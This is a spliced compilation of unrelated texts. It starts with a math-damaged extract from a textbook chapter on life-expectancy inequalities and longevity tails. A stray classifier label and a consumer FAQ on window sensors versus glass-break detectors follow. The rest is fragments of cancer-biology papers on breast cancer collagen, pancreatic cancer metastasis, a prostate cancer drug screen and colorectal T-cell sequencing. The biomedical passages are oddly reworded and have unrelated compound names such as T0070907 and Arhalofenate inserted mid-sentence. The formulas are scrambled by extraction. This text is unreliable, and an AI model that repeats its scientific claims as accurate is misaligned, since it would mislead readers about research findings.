μ ( x, t ) N ( x, t ), x ≥ 0 . Under the assumption of the mortality rate μ ( x, t ) that increases with age, this structure gives larger probabilities to ages beyond x than the age structure N ( x, t ), x ≥ 0 , which results in an inequality similar to Inequality (10.37) and, finally, in Inequality (10.48). Note that human mortality is described by a mortality rate that increases with age x , as defined by the Gompertz law (10.1) and the Gompertz shift model (10.28). 10.7.3 Comparison of Life Expectancies 10.7.3.1 Comparison of e(0, t ) with e∗ (0, t ) As previously, we will make this comparison for a population that experiences no migration and a constant annual birth rate. As the population is growing (the mortality rate is decreasing in calendar time t ), μ ∗ ( x, t ) − μ ( x, t ) > 0; ∀x ≥ 0 , (10.49) which obviously leads to the corresponding ordering of life expectancies (see Equations (10.44) and (10.46)) and to a distortion Δ(t ) : Δ(t ) ≡ e(0, t ) − e∗ (0, t ) > 0. (10.50) This is a general result for the population of the defined type, which can also be formulated as ∞⎛ ∞⎛ ⎧⎪ x ⎫⎪ ⎞ ⎧⎪ x ⎫⎪ ⎞ Δ(t ) = ⎜ exp⎨− μ (u , t )du ⎬ ⎟dx − ⎜ exp⎨− μ (u , t − x + u )du ⎬ ⎟dx . ⎜ ⎜ ⎪⎩ 0 ⎪⎭ ⎟⎠ ⎪⎩ 0 ⎪⎭ ⎟⎠ 0⎝ 0⎝ Bongaarts and Feeney (2002) make additional assumptions for estimating this distortion that they call the tempo bias. They assume that changes in the population age structure N ( x, t ), x ≥ 0 owing to mortality decline with time t are modelled as the age-independent shift s (t ) to the larger ages, i.e., x < s (t ), ⎧ B, N ( x, t ) = ⎨ ⎩ N ( x − s (t ), 0), x ≥ s (t ). (10.51) 264 Failure Rate Modelling for Reliability and Risk Note that Equation (10.51) leads to the same shift in mortality rates. Formally, this is a rather stringent assumption, but assuming the Gompertz law for mortality curves with the fixed t , we immediately arrive at the Gompertz shift model (10.28), as the exponential function ‘converts shifts into multipliers’. It was also proved by these authors that ⎛ μ ( x, t ) = ⎜⎜1 − ⎝ de∗ (0, t ) ⎞ ∗ ⎟ μ ( x, t ) . dt ⎟⎠ (10.52) Equation (10.52) shows that when the life expectancy e∗ (0, t ) is increasing, the observed mortality rate μ ( x, t ) is smaller than μ ∗ ( x, t ) . Using numerical procedures, Bongaarts and Feeney (2002) obtained the values of e∗ (0, t ) and the corresponding tempo bias Δ t . It turned out that the average tempo bias, e.g., for females in France, Japan, Sweden and the USA for the period from 1980 to 1995 is rather large: 2.3 years, 3.3 years, 1.6 years and 1.6 years, respectively. However, a question still remains: is e∗ (0, t ) , defined for a specific population under the stringent conditions, the best candidate for the ‘true’ life expectancy? 10.7.3.2 Comparison of e(0, t ) with A(t ) The following theorem (Finkelstein, 2005a) is a direct consequence of Equations (10.43) and (10.47). Theorem 10.2 Let N ∗ ( x, t ), x ≥ 0 be an age structure for a hypothetical population defined by equation (10.43). Then the average age at death for this population A∗ (t ) is equal to the conventional life expectancy e(0, t ) : ∞ ∫ xμ ( x, t ) N A (t ) ≡ ( x, t )dx = e(0, t ) . 0 ∞ ∫ μ ( x, t ) N (10.53) ( x, t )dx 0 Theorem 10.3 Let the mortality rate μ ( x, t ) decrease in calendar time t . Assume that the population age structures N ( x, t ) and N ∗ ( x, t ) are given by Equations (10.39) and (10.43), respectively. Then the conventional life expectancy e(0, t ) is larger than the average age at death (10.47): e(0, t ) − A(t ) > 0 . (10.54) Proof. In accordance with Theorem 10.2 and Equation (10.47), we must prove that ∞ xμ ( x, t ) N ∗ ( x, t )dx − 0 ∞ ∫ μ ( x, t ) N 0 ( x, t )dx ∫ xμ ( x, t ) N ( x, t )dx 0 ∞ ∫ μ ( x, t ) N ( x, t )dx 0 >0. (10.55) Demographic and Biological Applications 265 As the ordering of survival functions leads to the same ordering of the corresponding mean values, Inequality (10.55) immediately follows from Lemma 10.2 (the sign of inequality of this lemma will be opposite for survival functions). Note that for proving Inequality (10.54) we do not need additional proportionality assumptions. 10.7.3.3. Comparison with a Hypothetical Cohort The following alternative comparison with a hypothetical cohort can also be helpful. Let M denote the maximum age in the life table, e.g., M = 110 years. The age structure N ( x, t ), x ≥ 0 means that B0 (t − x) individuals were born at t − x and N ( x, t ) of whom had survived to t . Let us shift the ‘life trajectories’ of survivors backwards by M − x units of time. This means that the whole population with size N (t ) will be born at t − M and the cohort for this whole population can be considered. As mortality rates are declining with t , μ ( x, t − M + x ) > μ ( x , t ) . This inequality also means that e(0, t ) > es (0, t ) , where es (0, t ) denotes the life expectancy of the described shifted cohort. 10.7.4 Further Inequalities In this section, only the case of stationary populations will be considered. Denote by lc (x) the life table survival probability for some stationary population, which corresponds to the general time-dependent Equation (10.45). In accordance with Remark 10.2, the pdf of the age of an individual chosen at random (with an equal chance) from a population of size N (t ) is f a ( x) = lc ( x ) . (10.56) ∫ l (u)du c 0 Define the mean life expectancy E by averaging the corresponding stationary life expectancy at x (Section 10.7.2.1) ∞ ∫ l (u)du c e( x ) = with respect to pdf (10.56), i.e., x lc ( x ) 266 Failure Rate Modelling for Reliability and Risk ⎛∞ ⎞ ⎜ lc (u )du ⎟dx e ( x ) l ( x ) dx c ∫ ⎜ ⎟ ⎠ . = 0 ⎝ x∞ E= 0 ∞ ∞ ∫ ∫ (10.57) ∫ l (u )du ∫ l ( x)dx c c 0 0 Thus, E is the average time to death for an individual chosen randomly (with an equal chance) from the whole population at some fixed time t . Remark 10.3 A different type of averaging can be considered in a cohort setting. Assume as in Keyfitz and Casewell (2005) that death deprives an individual of the remainder of his life expectancy (see also Example 4.1). Thus death, which had occurred in [ x, x + dx] , deprived an individual of e(x) years, i.e., his life expectancy at x . Let, as usual, f (t ) denote the lifetime pdf. The average life deprivation at death is therefore ~ E= ∫ 0 f (u )e(u )du = e(u ) μ (u )lc (u )du 0 ⎛ ⎛∞ ⎞⎞ = ⎜ μ (x )⎜ lc (u )du ⎟ ⎟dx . ⎜ ⎟⎟ ⎜ 0⎝ ⎝x ⎠⎠ ∞ A better statistical interpretation is, however, the one involving the notion of ‘another chance of life’ or lifesaving as defined in Section 10.4. The corresponding reliability interpretation of this operation is: a single ‘minimal repair at death’. Consider now two stationary populations with survival functions lc1 ( x) and lc 2 ( x) , respectively. Let lc1 ( x) > lc 2 ( x), ∀x > 0 , (10.58) which can be interpreted as the (usual) stochastic ordering between the corresponding lifetime random variables. Theorem 10.4. Let Ordering (10.58) for two stationary populations hold. Then E1 > E2 . (10.59) Proof. We will outline a sketch of this proof that can be made mathematically strict in an obvious, although cumbersome, way. Let lc1 ( x) = lc 2 ( x) + δ ( x) , Demographic and Biological Applications 267 where x0 ∈ (0, ∞) and the continuous function δ (x ) is 0 outside the interval [ x0 − ε , x0 + ε ] ; δ ( x0 − ε ) = δ ( x0 + ε ) = 0 . Assume that ε is sufficiently small and that the area x0 +ε Δ = δ ( x)dx = δ ( x)dx x0 −ε 0 is also sufficiently small. Assume that δ (x ) does not change the monotonicity of lc 2 ( x) and therefore, the function lc1 ( x) is a survival function. Transformation of E1 results in the following: ⎛∞ ⎞ ⎜ lc1 (u )du ⎟dx ⎜ ⎟ ⎠ = E1 = 0 ⎝ x∞ ∞ ∫∫ x0 +ε ∞ ⎛∞ ⎞ ⎛∞ ⎞ ⎜ lc1 (u )du ⎟dx + ⎜ lc1 (u )du ⎟dx ⎜ ⎟ ⎜ ⎟ x0 +ε ⎝ x ⎝x ⎠ ⎠ ∫ ∫ 0 ∫ ∫ ∫l lc1 (u )du 0 x0 +ε = (u )du ∞ ⎛∞ ⎞ ⎞ ⎛∞ ⎜ lc 2 (u )du ⎟dx ⎜ lc 2 (u )du + Δ ⎟dx + ⎜ ⎟ ⎟ ⎜ x0 +ε ⎝ x ⎠ ⎠ ⎝x ∫ ∫ 0 c1 0 ∫ ∫ ∫l c2 (u )du + Δ 0 ⎛∞ ⎞ Δ ( x0 + ε ) + ∫ ⎜ ∫ lc 2 (u )du ⎟dx ⎜ ⎟ 0⎝ x ⎠ = = ∞ ∞ ∫ lc 2 (u)du + Δ 0 Δ ( x0 + ε ) ∞ ∫l c2 (u )du 0 1+ + E2 Δ ∞ ∫l c2 (u )du 0 ⎞ ⎛ ⎟ ⎜ ⎟ ⎜ Δ ( x0 + ε ) Δ −∞ = ⎜ E2 + ∞ ⎟(1 + o(1)) , ⎜ lc 2 (u )du ∫ lc 2 (u )du ⎟ ∫ ⎟ ⎜ 0 0 ⎠ ⎝ which holds asymptotically for sufficiently small Δ . On the other hand, the difference in the last line is positive for ( x0 + ε ) > 1 , and therefore Inequality (10.59) holds in this case. Assume that our survival functions differ outside the initial small interval [0,1) . Thus, using a sequence of properly arranged infinitesimal steps of the described type, we can ‘transform’ any survival function lc 2 ( x) into the survival function lc1 (t ) . It can be shown under reasonable assumptions that this small (compared with [1, ∞) ) initial interval will not ‘spoil’ the described procedure. 268 Failure Rate Modelling for Reliability and Risk We will now construct a counterexample showing that a weaker assumption than (10.58) does not result in Ordering (10.59). Assume that life expectancies at birth for two populations are ordered as e1 (0) > e2 (0) . (10.60) As life expectancy is an integral of the corresponding survival function, Inequality (10.60) follows from Inequality (10.58). Let the graphs of lc1 ( x) and lc 2 ( x) cross only once at xc in such a way that lc1 ( x) < lc 2 ( x) for x ∈ (0, xc ) and lc1 ( x) > lc 2 ( x) for x ∈ ( xc , ∞) . Assume first that the corresponding life expectancies are equal, i.e., ∞ 0 0 e1 (0) = ∫ lc1 ( x)dx = ∫ lc 2 ( x)dx = e2 (0) . (10.61) Considering areas under these survival curves it is easy to derive taking into account Equations (10.57) and (10.61) that E1 > E2 , as ∞ x x ∫ lc1 ( x)dx > ∫ lc 2 ( x)dx, ∀x > 0 . (10.62) We will now use the following variation principle. Transform ‘slightly’ the curve lc1 ( x) in x ∈ (0, xc ) (not changing monotonicity and its values at 0 and xc ) in such a way that its values are smaller than those of lc1 ( x) in this interval. It follows from Equation (10.61) that e2 (0) = e~1 (0) + ε , (10.63) where e~1 (0) is the life expectancy that corresponds to the new survival curve and ε > 0 is a sufficiently small quantity. Equation (10.63) means that, in contrast to Assumption (10.60), the inequality e~1 (0) < e2 (0) holds. However, as ε can be made as small as we wish, Inequality (10.62) is not violated (excluding an initial interval that can be made arbitrarily ~ small) and the mean life expectancies defined by Equation (10.57) are ordered as E1 > E2 . Therefore, an ordering of life expectancies at birth (which is weaker than (10.58)) does not imply the same direction in ordering of the mean life expectancies. This reasoning can also be made mathematically strict, but the idea and the result are obvious. Remark 10.4 The author is grateful to Professor Joshua Goldstein for the setting of Section 10.7.4. 10.8 Tail of Longevity In this section, we will briefly consider (see Finkelstein and Vaupel, 2006 for the full version) a practical demographic modification of the remaining lifetime concept in a cohort setting to finite but large populations. Another important feature of this approach is that the suggested characteristic is defined via the two distribu- Demographic and Biological Applications 269 tions. The first one is the ordinary distribution of a lifespan, whereas the second one is the distribution of a lifetime of the last survivor in a population. Consider a stationary population of a sufficiently large size N . As usual, denote by X the random age at death and by ω N the random maximum age at death (the age at last death) in this population. It is challenging to define the tail of longevity as some remaining potential lifetime, taking into account the maximum lifetime variable ω N . Denote by τ (ω N , q ) the q -quantile for the distribution of ω N , i.e., Pr[ω N ≤ τ (ω N , q)] = q and by τ (q0 ) the q0 -quantile for the distribution of X , i.e., Pr[ X ≤ τ (q0 )] = q0 . Vaupel (2003) defines the tail of longevity as the difference TL(q, q0 ) ≡ τ (ω N , q) − τ (q0 ) (10.64) and the relative tail of longevity as RTL(q, q0 ) ≡ τ (ω N , q ) −1 . τ (q0 ) (10.65) Our main focus is on the relative tail. Relative measures are necessary for adequate comparisons of tails in different populations. Vaupel (2003) considered specific values of quantiles: q = 0.5 and q0 = 0.9 . The latter value marks the left endpoint of the post-reproductive zone for some organisms, where the force of natural selection is no longer active. The median of the maximal lifespan distribution τ (ω N , 0.5) is just a reasonable choice for a quantile of this distribution. Not that formally we do not rely on specific values of q and q0 , as the only reasonable restriction is that the corresponding quantiles should be properly ordered ( τ (ω N , q) > τ (q0 ) ), which is obviously the case in reality. In accordance with (2.5), the Cdf of the age at death X is ⎛ t ⎞ F (t ) = 1 − exp⎜ − ∫ μ (u )du ⎟ , ⎜ ⎟ ⎝ 0 ⎠ (10.66) where μ (t ) is the corresponding mortality rate. Let ⎛ t ⎞ S (t ) = N exp⎜ − ∫ μ (u )du ⎟ ⎜ ⎟ ⎝ 0 ⎠ (10.67) be the expected number of members of the population who will survive at t , starting with initial value S (0) = N . 270 Failure Rate Modelling for Reliability and Risk In line with general considerations on the distribution of the maximum of N i.i.d. random variables, Thatcher (1999) showed that the Cdf of ω N , for large N , can be defined as FN (t ) ≡ Pr[ω N ≤ t ] = (F (t ) ) N N ⎛ S (t ) ⎞ = ⎜1 − ⎟ ≈ exp(− S (t )) N ⎠ ⎝ ⎛ ⎞⎞ ⎛ t = exp⎜ − N exp⎜ − ∫ μ (u )du ⎟ ⎟ . ⎟⎟ ⎜ ⎜ ⎠⎠ ⎝ 0 ⎝ (10.68) Using Equation (10.68), the quantile τ (ω N , q ) is obtained from S (τ (ω N , q)) = − ln q . (10.69) Therefore, taking into account Equation (10.67), τ (ω N , q ) ∫ μ (u)du ≈ ln N − ln(− ln q) . (10.70) 0 The second term on the right in Equation (10.70) is of minor importance, as N is large and we are not interested in the ‘too high quantiles’ when studying the maximal value distributions. For large enough N , Relationship (10.70) can be practically considered an equality, and this will be assumed in what follows. Doubling the sample size N will only slightly increase τ (ωN , q) for sufficiently large N . The increase from N to N 2 or N 3 gives a substantial increase, depending on the shape of the mortality rate: it is smaller for increasing failure rates and larger for constant and decreasing failure rates. This result follows from Equation (10.70). Our goal is to compare τ (ω N , q ) with the quantile τ (q0 ) obtained from (10.67), i.e., F (τ (q0 )) = q0 . Note that the quantile τ (q0 ) , chosen as 0.9 , defines the starting point of old age (Vaupel, 2003). Formally, however, we are not very concerned with the concrete values of q0 and q as we only need the following ordering: τ (q0 ) < τ (ω N , q ) . Redundancy is the main tool in designing reliable technical structures. The idea that redundant structures constitute a plausible lifetime model seems very attractive, as the extremely high ‘reliability of humans’ is likely to exist in nature only with the help of redundancy on different levels. In what follows, we will prove the conjecture of Vaupel (2003) that redundancy decreases the relative tail of longevity. In Finkelstein and Vaupel (2006) it was also proved that heterogeneity in a population increases the tail of longevity. Consider the case of loaded redundancy when n i.i.d. components operate in parallel. The case of unloaded redundancy (standby) is considered in a similar way. Mortality rates of the simplest redundant structures of identical components with constant mortality rates, operating in parallel, were analysed by Gavrilov and Gavrilova (1991, 2002). These authors show that for sufficiently small t , the mortality rate of the fixed parallel structure (loaded redundancy) approximately follows Demographic and Biological Applications 271 the power law, and the mortality rate of a structure with a random number of initially operating components approximately follows the Gompertz law (see Example 10.1 for more details). The Cdf of the time to death (failure) of the described system is Fn (t ) = ( F (t )) n , n = 1,2,... and the corresponding quantile τ (n, q0 ); τ (1, q0 ) ≡ τ (q0 ) is obtained from equation Fn (τ (n, q0 )) = q0 or, equivalently, 1 F (τ (n, q0 )) = q0n . (10.71) This means that the effect of redundancy of this type changes the baseline level q0 to q01/ n . For reasonable parameter values, this usually leads to a substantial increase in the quantile. What about the maximal lifespan quantile? The only difference from the baseline τ (ω N , q ) is the size of the sample, which is now nN , because the maximum value is observed at the failure of the last of the nN components. Therefore, Equation (10.70) for obtaining τ (ω N , q ) becomes the following equation: τ (ωnN ,q ) ∫ μ (u)du = ln N + ln n − ln(− ln q) (10.72) 0 for obtaining τ (ωnN , q ) . Usually, n is small with respect to N (although this is probably not the case for the molecular or genetic level). As N → ∞ , the term ln n is negligible. Therefore, τ (ωnN , q ) / τ (ω N , q ) → 1 as N → ∞ . (10.73) Theorem 10.5. Let the sample size N be sufficiently large. Then the relative tail of longevity for a system with a loaded redundancy structure is smaller than the relative tail of longevity for a non-redundant system, i.e., RTL(n, q, q0 ) < RTL(q, q0 ), n = 2,3,... . Proof. It follows from (10.73) that for large enough N τ (n, q0 ) τ (ωnN , q) > τ (q0 ) τ (ω N , q ) and, in accordance with the definition of the relative tail of longevity, RTL(n, q, q0 ) + 1 τ (ωnN , q )τ (q0 ) =
__label__pos
0.991012
Knowledge Base:   You are here: Knowledge Base > Sensors What's the difference between a glass break sensor and a window sensor? Last Updated: 11/07/2013 A window sensor, like the 5811BR, works in a similar way to a door sensor.  It has an internal reed switch, a magnet, and a contact.  The magnet and reed switch are close together when the window is closed.  An opened window separates the two which triggers an alarm.  A window sensor only sounds an alarm when a window is opened. But what if the window is broken? That's where the Honeywell Glassbreak Detector comes in.  Glassbreak detectors are equipped with audio microphones that detect the sound frequency of broken glass.  These sensors are typically mounted on the wall opposite a window, and if an intruder should break the glass, the alarm will trigger. Shock sensors work like preemptive glassbreak sensors.  They can sense when window glass is vibrating at a rate consistent with someone trying to forcibly break the glass.  This sensor triggers an alarm before a window is even broken, which deters an intruder even before entry, and saves you the cost of having to replace a broken window. Was this article helpful? Comments:   Related Articles  > What kind of Steel Door Contact should I use?  > Can I take down a window or door sensor without setting off an alarm?  > Should I install glass break detectors and motion sensors in my house?  > Will Honeywell wireless sensors work with all security systems?  > What is an alarm sensor DIP switch?  > What is the average life of an alarm sensor battery?  > What is a recessed door sensor?  > How do I install a wireless door/window sensor with a magnet?  > How do wireless sensors protect windows against intrusions?  > What can cause my 5800 series wireless sensor to lose RF supervision?
__label__pos
1
Breast cancer tumor is a respected disease in women Breast cancer tumor is a respected disease in women. concentrations/arrays result in morphological modifications of breast cancer tumor cells. Intriguingly, the elongated mesenchymal designed cells were even more prominent in 3D cultures using a thick and dense substrate (dense Matrigel, high focused collagen network, and densely loaded collagen fibres), despite the fact that cells with different shape created and released exosomes and microvesicles aswell. Hence, it is evident which the peri-tumoral collagen network may action not only being a hurdle but also being a powerful scaffold which stimulates the morphological adjustments of cancers cells, and modulates tumor advancement and metastatic potential in breasts cancer. strong course=”kwd-title” Keywords: breasts cancer tumor, 3D cultures, collagen, cell morphology, checking electron microscopy (SEM) 1. Launch Tumors are seen as a a lack of tissues organization with unusual and uncontrolled T0070907 behavior of cells that develop independently. Cancer tumor cells connect to the surrounding tissue by inducing extracellular matrix (ECM) adjustments comparable to those within wounds that hardly ever heal [1,2,3,4]. In solid tumors the constant T0070907 expansion from the tumor mass exerts pushes on the encompassing tissue so that cancers cells eliminate their adhesion with neighboring cells, disseminate by invading and disseminating in to the encircling microenvironment and start the colonization metastasis and procedure [5,6,7]. Because so many of cancers patient fatalities are caused not really by the principal tumor, but by faraway metastasis, it is vital to comprehend why and exactly how cancers cells gain motility and be migratory to be able to penetrate into bloodstream and lymphatic vessels and colonize faraway organs [5]. At that time cancer cells eliminate their cellCcell junctions and create a migrating capacity they become in a position to combination natural barriers just like the basement membrane, hence differentiating into harmful intrusive cells through the epithelial-to-mesenchymal changeover (EMT) procedure [8,9,10]. Cells involved with EMT procedure screen a mesenchymal or spindle-like form, lack of cell adhesion, inhibition of E-cadherin appearance, and elevated cell flexibility [11,12]. Adjustments in tumor microenvironment play a crucial function in tumor development and advancement aswell in medication efficiency [6,13,14,15]. ECM may be the main element of connective tissue and contains (a) fibrillar protein constituents (collagen and elastin) transmitting and generally resisting tensional pushes, and (b) hydrophilic and water-soluble the different parts of the ground product (glycosaminoglycans and proteoglycans) playing a T0070907 significant function in buffering and hydration and opposing compressive pushes [4,16,17]. ECM represents a powerful and useful physical scaffold, in a position to both adjust to deformations due to internal and exterior mechanical tension and selectively control the diffusion of air and nutrients. Furthermore, ECM is important in modulating the level of resistance that shifting cells match while crossing the collagen network of connective tissue [18,19]. The primary element of ECM is normally fibrillar type I collagen that by itself constitutes up to 90% protein structure of connective tissue [16,20]. Cancers cells impact peri-tumoral collagen formation but alternatively the mechanised properties of collagen and Rabbit polyclonal to ADNP2 mobile microenvironment have an excellent influence on cancers cell behavior [21]. In cancers progression, compressive mechanised forces caused by tumor growth can promote intrusive cell and phenotype migration. At the same time, they donate to hypoxia through the collapse of lymphatics or small-blood vessels as well as the boost of interstitial liquid pressure [15,22,23]. Tumor mass rigidity or rigidity from the tumor microenvironment is basically due to elevated deposition and brand-new agreement of ECM proteins vs. encircling healthy tissue [24,25]. When tumors develop, ECM stiffening enhances the chance of metastasis [26 critically,27,28,29,30]. This appears to be related both towards the deposition of fibronectin, proteoglycans, types I, III, IV collagens, as well as the boost. Supplementary MaterialsSupplementary Desks and information 41388_2018_144_MOESM1_ESM Supplementary MaterialsSupplementary Desks and information 41388_2018_144_MOESM1_ESM. cell-related genes, those portrayed in the 3P cells particularly, including mutations, which are located in over 90% of pancreatic cancers cases, are believed to be always a driver from the tumorigenesis in pancreatic cancers [3, 4]. Furthermore, deletions or inactivating mutations in a number of genes, including mice. Although in vivo bioluminescence imaging uncovered formation of principal tumors in both versions, peritoneal dissemination was noticed just in the orthotopic tumor model (Fig. ?(Fig.1a).1a). Equivalent results had been attained in mouse tumor versions with individual pancreatic cancers Panc-1 cells (Fig. ?(Fig.1b).1b). Principal tumors had been seen in all mice in the orthotopic tumor style of Panc-1 cells, whereas not absolutely all mice developed principal tumors in the subcutaneous style of Panc-1 cells. Furthermore, liver organ metastasis and peritoneal dissemination had been seen in some mice in the orthotopic tumor model with Panc-1 cells (Fig. ?(Fig.1b).1b). Histological evaluation revealed that dermal tissues was located following towards the inoculated cancers cells in the subcutaneous tumor model with SUIT-2 cells, while CTX 0294885 cancers cells in pancreatic tissues had been close to regular pancreatic acinar cells in the orthotopic tumor model with SUIT-2 cells (Fig. ?(Fig.1c).1c). However the histological features had been distinct between your two versions, the percentage of Azan-positive areas didn’t apparently differ between your two tumor versions (Fig. ?(Fig.1c).1c). These observations recommended that connections between cancers cells and encircling stromal cells had been turned on in both tumor versions. Open in another screen Fig. 1 Ramifications of the tumor microenvironment on tumor development in pancreatic cancers cells. a Time-course evaluation of mouse tumor types of Fit-2 cells. The same number of Fit-2 CTX 0294885 cells was inoculated into subcutaneous tissues (subcutaneous tumor model; best still left) or the pancreas (orthotopic tumor model; bottom level still left). Tumor development was supervised using in vivo bioluminescence imaging. Following the mice had been killed, occurrence of principal tumor development and metastasis was verified by autopsy. The indication area (best correct) and occurrence (bottom correct) of principal tumor CTX 0294885 development and peritoneal dissemination at 35 d after inoculation are proven. b Analysis from the mouse tumor types of Panc-1 cells. The same variety of Panc-1 cells was inoculated into subcutaneous tissues (subcutaneous tumor model) or the pancreas (orthotopic tumor model; still left). Tumor development was supervised using in vivo bioluminescence imaging 105 d after inoculation. Following the mice had been killed, occurrence of principal tumor development and metastasis was verified by autopsy. The indication area in the principal tumor (best correct) as well as the occurrence of the principal tumor, liver organ metastasis, and peritoneal dissemination (bottom level correct) are proven. c Principal tumors had been put through hematoxylinCeosin (HE) staining and Azan staining. CDC25 Representative pictures are shown. Range pubs are 100?m. Data are provided as mean??SD (a, b). *mRNA and levels of E-cadherin proteins had been dependant on qRT-PCR evaluation (c) and immunoblotting (d), respectively. e Adhesion assay from the cell lines produced from Fit-2 cells. Cells had been seeded into fibronectin-coated 96-well plates beneath the FBS-free circumstances and cultured for 30?min. The pictures of adhered cells (still left) as well as the absorbance at 570?nm (best) are shown. f Chamber migration assay from the cell lines produced from Fit-2 cells. Cells had been seeded in to the CTX 0294885 chamber and incubated for 24?h. The representative pictures (still left) and the amount of migrated cells (correct) are proven. Scale pubs are 100?m. Data are provided as mean (duplicate; c) and mean??SD (e, f), respectively. **mRNA had been dependant on qRT-PCR evaluation. Data are provided as mean (duplicate; f) Assignments of Nestin in pancreatic cancers development Gene ontology analyses demonstrated that biological procedures linked to stem cell advancement or proliferation had been activated particularly in the cell lines produced from the orthotopic types of SUIT-2 and Panc-1 (Figs. 4c,e). Particularly, RNA-seq analysis confirmed that the appearance of some stem cell markers elevated, including in the cell lines from Fit-2 and sex-determining area Y (SRY)-container 2 (gene continues to be reported in ~17% of scientific specimens of pancreatic cancers [16]. Highly malignant cancers cell lines had been also set up from various other pancreatic cancers cells (MiaPACA-2 and BxPC3) through serial transplantations using the orthotopic model, as defined in Fig. ?Fig.2a.2a. Elevated appearance of mRNA. Supplementary Materials1 Supplementary Materials1. susceptible to develop metastasis and level of resistance to hormone deprivation, the typical of treatment in Arhalofenate advanced Computer (Cho et al., 2014). This prompted us to display screen for drugs from this particular genotype. Importantly, many studies uncovered that p53 reduction alone resulted in no signals of prostate disease (Chen et al., 2005; Ding et al., 2011). We hence attempt to recognize medications that selectively focus on genetically constructed cells from the genotype that provides rise to lethal disease (recombinase. Cells had been chosen (using viral vector-encoded selection markers) to create 100 % pure populations. Chemotherapeutic efficiency of 23 realtors (each at three concentrations) was evaluated, and results on both genotypes had been assessed via evaluation Arhalofenate of cell activity, viability, and amount (tetrazolium dye-based assay produced by Biolog). (B) Viability assessed more than a 24 hr amount of cells, we verified that it had the same results as observed in position. A red series over the x axis signifies physiological blood sugar range. Error pubs are SD (n Hes2 = 3). (C) Per cell blood sugar intake in status or blood sugar concentration (Amount S2F). Jointly, our outcomes recommended that deguelin could accelerate the high dependence on blood sugar of and (Amount S4A, Tom20 strength). Collectively, our outcomes demonstrated that deguelin (1) is normally well tolerated over a protracted period, (2) gets to prostate, (3) strikes its focus on, and (4) can stall or revert development of advanced Computer, consistent with early metformin trial outcomes from individual metastatic PC sufferers (Rothermundt et al., 2014). Debate Landmark studies have got connected metformin make use of with reduced cancer tumor mortality (Landman et al., 2010; Xu et al., 2015), spawning several clinical studies (as analyzed in Pernicova and Korbonits, 2014). In prostate particularly, a reduction in cancers mortality continues to be seen, however, not in cancers occurrence (Margel et al., 2013a, 2013b). This shows that metformin may focus on intense Computer, which is the main topic of ongoing studies (Gillessen et al., 2016). The breakthrough of CI because the useful focus on of metformin (Wheaton et al., 2014) provides led to advancement of studies with an increase of effective however tolerated drugs, like the IACS-010759 chemical substance found in this scholarly research. Our outcomes can donate to these initiatives. They indicate a mitochondrial vulnerability, powered by complicated V inversion, for attaining highly selective eliminating of advanced and loci continues to be defined previously (Cho et al., 2014). For pre-clinical studies, mice had been treated with deguelin (Sigma-Aldrich) via intra-peritoneal shot on a Mon/Wednesday timetable. The dosage of deguelin was escalated during the period of the trial, you start with 0.4 mg/kg and increasing to at least one 1.6 mg/kg in 14 days. A dose of just one 1.2 mg/kg was determined to work, and mice had been treated at 1.2 mg/kg until week 5 from the trial. The dosage was increased from 1.2 to 4 mg/kg (we.e., 1.on Mon 6 mg/kg, 2.0 mg/kg on Thursday) during the period of the rest of the 5 weeks. Additional options for live deguelin and imaging dosing are defined within the Supplemental Information. Prostate Deguelin Removal and LC Mass Spectrometry Tissues was homogenized with 300 L of just one 1 PBS and sonicated Arhalofenate for 60 s. 2 hundred microliters of ethyl acetate was put into homogenates, accompanied by vortexing. Arhalofenate 2 hundred microliters had been used in a fresh pipe and centrifuged at 14 after that,000 rpm for 10 min. The ethyl acetate level was used in a clean 1.7 mL tube and evaporated utilizing a speed vac. Examples had been reconstituted with 100 L of 50% acetonitrile with 0.1% formic acidity, and 5 L were injected onto the triple-quadrupole mass spectrometer. Further mass spectrometry strategies are referred to within the Supplemental Info. Statistical Strategies Data were plotted and statistical analysis was performed using GraphPad and Numbers Prism.. Data CitationsZhang Con, Zheng LT, Zhang L, Zhang Z Data CitationsZhang Con, Zheng LT, Zhang L, Zhang Z. Open in a separate window Fig. 1 Schematic overview of the study design and analysis pipeline. (a) The experimental flowchart of this study. (b) The bioinformatics pipeline used for data analysis. Softwares used in each steps were labelled in blue. WES, whole exome sequencing; DEG, differentially expressed gene; dist, tissue distribution; expa, clonal expansion; migr, cross-tissue migration; tran, developmental transition. Table 1 Clinical characteristics of 12 CRC patients. and larger than 10 had been kept for following evaluation. We identified CD4+ further, CD8+, Compact disc4?CD8? (dual harmful) and Compact disc4+Compact disc8+ (dual positive) T cells predicated on the gene appearance data. Given the common TPM of and positive or harmful if the worthiness was bigger than 30 or significantly less than 3, respectively; provided the TPM of harmful or positive if the worthiness was bigger than 30 or significantly less than 3, respectively. Therefore, the cells could be categorized as Compact disc4+Compact disc8?, Compact disc4?Compact disc8+, Compact disc4+Compact disc8+, Compact disc4?CD8? and other cells that can’t be defined clearly. While TPM can be an user-friendly and well-known dimension to standardize the full total quantity of transcripts between cells, it is insufficient and could bias downstream analysis because TPM can be dominated by a handful of highly expressed genes. Therefore, we mainly used TPM for preliminary data processing and gene expression visualization. Recently, methods for normalizing scRNA-seq data including scran18 have been proposed to implement strong and effective normalization, and thus we used the size-factor normalized go through count for main analyses in our study including dimensionality reduction, clustering and obtaining markers for each cluster. After discarding genes with average counts of fewer than or equal to 1, the count table of the cells passing the above filtering was normalized by a pooling strategy. Rabbit polyclonal to IL20RB The R was applied by us package scran18 in Bioconductor to execute the normalization process. Specifically, cells had been pre-clustered using the quickCluster function using the parameter technique?=?hclust. Size elements had been computed using computeSumFactors function using the parameter sizes?=?seq (20,100,by?=?20) which indicates the amount of cells per pool. Fresh counts of every cell had been divided by their size elements, as well as the resulting normalized counts had been scaled to log2 space and employed for batch correction then. Scran utilizes a pooling technique applied in computeSumFactors ASC-J9 function, where size elements for individual cells were deconvoluted from size factors of pools. To avoid violating the assumption that most genes were not differentially indicated, hierarchical clustering based on Spearmans rank correlation was performed with quickCluster function 1st, then normalization was performed in each producing cluster separately. The size element of each cluster was further re-scaled to enable assessment between clusters. To remove the possible effects of different donors on manifestation, the normalized table was ASC-J9 further centred by individual. Therefore, in the centred manifestation table, the mean ideals of the cells for each patient were zero. A total of 12,548 genes and 10,805 cells were retained in the final manifestation table. If not explicitly stated, normalized browse matter or normalized expression within this scholarly research identifies the normalized and centred matter data for simplicity. Unsupervised clustering evaluation of CRC one T cell RNA-seq dataset The cell clusters utilized here had been the same as defined in our related Nature paper11. The expression tables of CD8+CD4? T cells and CD8?CD4+ T cells as defined by the aforementioned classification but excluding MAIT cells and iNKT cells, were fed into an iteratively unsupervised clustering pipeline separately. Specifically, given expression table, the top n genes 